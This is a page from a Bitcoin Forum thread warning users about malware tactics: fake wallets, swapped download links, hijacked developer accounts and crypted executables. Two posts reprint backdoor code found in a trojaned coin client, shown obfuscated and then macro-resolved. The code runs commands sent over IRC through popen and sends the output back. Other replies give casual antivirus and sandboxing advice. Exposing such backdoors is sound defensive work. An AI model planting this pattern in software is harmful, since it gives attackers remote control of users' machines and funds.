Bitcoin Forum
December 13, 2019, 03:59:31 PM *
News: Latest Bitcoin Core release: 0.19.0.1 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 165952 times)
RoseMann
Sr. Member
****
Offline Offline

Activity: 277
Merit: 250


View Profile
August 11, 2016, 02:56:05 AM
 #81

Thank you for this warning, (i said with 30 trojan horse viruses attacking me at the same time)

1576252771
Hero Member
*
Offline Offline

Posts: 1576252771

View Profile Personal Message (Offline)

Ignore
1576252771
Reply with quote  #2

1576252771
Report to moderator
1576252771
Hero Member
*
Offline Offline

Posts: 1576252771

View Profile Personal Message (Offline)

Ignore
1576252771
Reply with quote  #2

1576252771
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1576252771
Hero Member
*
Offline Offline

Posts: 1576252771

View Profile Personal Message (Offline)

Ignore
1576252771
Reply with quote  #2

1576252771
Report to moderator
Brybtc
Newbie
*
Offline Offline

Activity: 12
Merit: 0


View Profile
August 13, 2016, 08:11:04 PM
 #82

Speaking of antivirus can the results from AV-TEST be trusted?

Is it impartial? do they do proper testing or just surface easy stuff?

groggin
Legendary
*
Offline Offline

Activity: 1860
Merit: 1001



View Profile
September 02, 2016, 03:48:48 AM
 #83

Speaking of antivirus can the results from AV-TEST be trusted?

Is it impartial? do they do proper testing or just surface easy stuff?
 

  use www.virustotal.com to scan small files (like wallets) it uses +/- 50 AV engines to scan, it's prolly faster than using your onboard AV

                            - BUT remember, serious hackers will have no problem hiding their payload

                                                                                      

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity[/b][/url]  |  Sign-up @ Aurovine to get FREE HD music ... and coins!| |
bilebil
Newbie
*
Offline Offline

Activity: 12
Merit: 0


View Profile
September 04, 2016, 02:03:22 PM
 #84

Could you List the différent scam
Qasim1234
Sr. Member
****
Offline Offline

Activity: 264
Merit: 250



View Profile WWW
September 05, 2016, 09:57:22 AM
 #85

i was infected with virus lol
shsfhs
Newbie
*
Offline Offline

Activity: 1
Merit: 0


View Profile
September 08, 2016, 11:50:59 AM
 #86

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Sasuke.Sasuke
Member
**
Offline Offline

Activity: 76
Merit: 10


View Profile
December 08, 2016, 05:36:23 AM
 #87

Useful thread..  I always use sandboxie and shado defender before installing or running any new program now a days.. .  And mediam level of hackers fears of virustotal because they send the file for further analysis(as what i've heard)  and their FUD malware loose its FUD ability.  So my suggestion will be...  Use sandboxie or any similar software and still use softwares like shadow defender for any kind of new programs... .  And before doing any thing just scan it in virustotal if you can.

Note: just don't trust any new person or software just like that.

In between the user(shsfhs) above me just quoted the original thread and no reply (seems like a new botter in town).
ioanbtc
Sr. Member
****
Offline Offline

Activity: 458
Merit: 251



View Profile
December 27, 2016, 09:34:23 PM
 #88

If i use antymalwarebytes i can be protected?

forces1234
Member
**
Offline Offline

Activity: 116
Merit: 10


View Profile
December 29, 2016, 10:50:30 PM
 #89

is there any good anti virus to handle it??
indiemax
Hero Member
*****
Offline Offline

Activity: 720
Merit: 500


View Profile
January 19, 2017, 06:18:42 PM
 #90

Beware of links sent to your PM box, even ones that look like a link to a thread on the forum.
JanpriX
Hero Member
*****
Offline Offline

Activity: 1176
Merit: 529

CryptoTalk.Org - Get Paid for every Post!


View Profile
February 11, 2017, 11:44:10 PM
 #91

is there any good anti virus to handle it??

I would like to ask this same question here. Can anyone site a software/site that can provide better anti-malware program for our PC? I know that being cautious in clicking/visiting links will avert you from malware but it wouldn't hurt if we can install a program that has good reputation in stopping malwares getting inside our machines.

 
                                . ██████████.
                              .████████████████.
                           .██████████████████████.
                        -█████████████████████████████
                     .██████████████████████████████████.
                  -█████████████████████████████████████████
               -███████████████████████████████████████████████
           .-█████████████████████████████████████████████████████.
        .████████████████████████████████████████████████████████████
       .██████████████████████████████████████████████████████████████.
       .██████████████████████████████████████████████████████████████.
       ..████████████████████████████████████████████████████████████..
       .   .██████████████████████████████████████████████████████.
       .      .████████████████████████████████████████████████.

       .       .██████████████████████████████████████████████
       .    ██████████████████████████████████████████████████████
       .█████████████████████████████████████████████████████████████.
        .███████████████████████████████████████████████████████████
           .█████████████████████████████████████████████████████
              .████████████████████████████████████████████████
                   ████████████████████████████████████████
                      ██████████████████████████████████
                          ██████████████████████████
                             ████████████████████
                               ████████████████
                                   █████████
.CryptoTalk.org.|.MAKE POSTS AND EARN BTC!.🏆
caribou2357
Newbie
*
Offline Offline

Activity: 10
Merit: 0


View Profile
February 15, 2017, 06:35:08 PM
Last edit: February 15, 2017, 06:46:41 PM by caribou2357
 #92

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
groggin
Legendary
*
Offline Offline

Activity: 1860
Merit: 1001



View Profile
February 15, 2017, 07:16:09 PM
 #93

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

 there is no comprehensive overall protection, think, rather in layers. a vpn, a good antivirus, spybot s&d, hosts file (hostsman), sandboxie, a virtual machine should all be in place.

  avoid win 10
  if u use 7, 8, or 8.1, remove or do not install the microsoft spyware
   even better, use mac or linux

there is freeware available to do all this  Cheesy

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity[/b][/url]  |  Sign-up @ Aurovine to get FREE HD music ... and coins!| |
MWesterweele
Hero Member
*****
Offline Offline

Activity: 1064
Merit: 562



View Profile
February 22, 2017, 06:32:40 AM
 #94

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.


thanks for informing us,however we must know how to avoid this. we all give importance to bitcoin,therfore we must take care of it. there are some kind of people that wants to earn bitcoin without giving some effort on it,they just want to take it to others easily. secure your browsers , dont click anything that is not important ,look may be deceiving brothers.

          ▄▄████▄▄
      ▄▄███▀    ▀███▄▄
   ▄████████▄▄▄▄████████▄
  ▀██████████████████████▀
▐█▄▄ ▀▀████▀    ▀████▀▀ ▄▄██
▐█████▄▄ ▀██▄▄▄▄██▀ ▄▄██▀  █
▐██ ▀████▄▄ ▀██▀ ▄▄████  ▄██
▐██  ███████▄  ▄████████████
▐██  █▌▐█ ▀██  ██████▀  ████
▐██  █▌▐█  ██  █████  ▄█████
 ███▄ ▌▐█  ██  ████████████▀
  ▀▀████▄ ▄██  ██▀  ████▀▀
      ▀▀█████  █  ▄██▀▀
         ▀▀██  ██▀▀
.WINDICE.████
██
██
██
██
██
██
██
██
██
██
██
██
████
      ▄████████▀
     ▄████████
    ▄███████▀
   ▄███████▀
  ▄█████████████
 ▄████████████▀
▄███████████▀
     █████▀
    ████▀
   ████
  ███▀
 ██▀
█▀

██
██
██
██
██
██
██
██
██
██
██
██
     ▄▄█████▄   ▄▄▄▄
    ██████████▄███████▄
  ▄████████████████████▌
 ████████████████████████
▐████████████████████████▌
 ▀██████████████████████▀
     ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
     ▄█     ▄█     ▄█
   ▄██▌   ▄██▌   ▄██▌
   ▀▀▀    ▀▀▀    ▀▀▀
       ▄█     ▄█
     ▄██▌   ▄██▌
     ▀▀▀    ▀▀▀

██
██
██
██
██
██
██
██
██
██
██
██
                   ▄█▄
                 ▄█████▄
                █████████▄
       ▄       ██ ████████▌
     ▄███▄    ▐█▌▐█████████
   ▄███████▄   ██ ▀███████▀
 ▄███████████▄  ▀██▄▄████▀
▐█ ▄███████████    ▀▀▀▀
█ █████████████▌      ▄
█▄▀████████████▌    ▄███▄
▐█▄▀███████████    ▐█▐███▌
 ▀██▄▄▀▀█████▀      ▀█▄█▀
   ▀▀▀███▀▀▀
████
  ██
  ██
  ██
  ██
  ██
  ██
  ██
  ██
  ██
  ██
  ██
  ██
████


▄▄████████▄▄
▄████████████████▄
▄████████████████████▄
███████████████▀▀  █████
████████████▀▀      ██████
▐████████▀▀   ▄▄     ██████▌
▐████▀▀    ▄█▀▀     ███████▌
▐████████ █▀        ███████▌
████████ █ ▄███▄   ███████
████████████████▄▄██████
▀████████████████████▀
▀████████████████▀
▀▀████████▀▀
iePlay NoweiI
I
I
I
redblue!!
Newbie
*
Offline Offline

Activity: 7
Merit: 0


View Profile
February 24, 2017, 06:29:58 AM
 #95

Thank you .. I think it is very good information for me as a beginner. I will always support you.
superresistant
Legendary
*
Offline Offline

Activity: 2030
Merit: 1095



View Profile
February 25, 2017, 06:55:19 PM
 #96

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.
rebel69
Member
**
Offline Offline

Activity: 66
Merit: 10


View Profile
February 27, 2017, 07:16:25 AM
 #97

THANK YOU FOR THE INFORMATION MY FRIEND  Grin

passwordnow
Hero Member
*****
Offline Offline

Activity: 1344
Merit: 515


View Profile
February 27, 2017, 01:47:25 PM
 #98

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.
vapourminer
Legendary
*
Offline Offline

Activity: 2494
Merit: 1251


what is this "brake pedal" you speak of?


View Profile
February 27, 2017, 02:00:41 PM
 #99

formatting/reinstalling an OS on a computer over and over does not reduce its lifespan. its one of the surest way of getting rid of suspected virus/malware.

if you were thinking of writes to SSDs, formatting/reinstalling will hardly reduce its effective lifespan, most will be long obsolete before they wear out.

whenever i set a new rig (mining or otherwise) up i image the OS as soon as its patched up and all essential programs are installed. that way all i need to do to go to a new, clean baseline OS is a one shot restore that takes minutes.
Cherylstar86
Sr. Member
****
Offline Offline

Activity: 1050
Merit: 252

CryptoTalk.Org - Get Paid for every Post!


View Profile
March 04, 2017, 11:14:43 AM
 #100

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.

Oh I see more optional solutions to help a lot of problems raised on this thread but, you're right its not really good to format your pc immediately just to give up solving the malware infection while OS is still running. For you to make the lifespan of your computer you must download the most reliable pc security that would take all the worries you have, and I can recommend  eset nod32 antivirus latest version now available if your search on their site online; even trial version works totally fine.

 
                                . ██████████.
                              .████████████████.
                           .██████████████████████.
                        -█████████████████████████████
                     .██████████████████████████████████.
                  -█████████████████████████████████████████
               -███████████████████████████████████████████████
           .-█████████████████████████████████████████████████████.
        .████████████████████████████████████████████████████████████
       .██████████████████████████████████████████████████████████████.
       .██████████████████████████████████████████████████████████████.
       ..████████████████████████████████████████████████████████████..
       .   .██████████████████████████████████████████████████████.
       .      .████████████████████████████████████████████████.

       .       .██████████████████████████████████████████████
       .    ██████████████████████████████████████████████████████
       .█████████████████████████████████████████████████████████████.
        .███████████████████████████████████████████████████████████
           .█████████████████████████████████████████████████████
              .████████████████████████████████████████████████
                   ████████████████████████████████████████
                      ██████████████████████████████████
                          ██████████████████████████
                             ████████████████████
                               ████████████████
                                   █████████
CryptoTalk.org| 
MAKE POSTS AND EARN BTC!
🏆
Pages: « 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 »
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!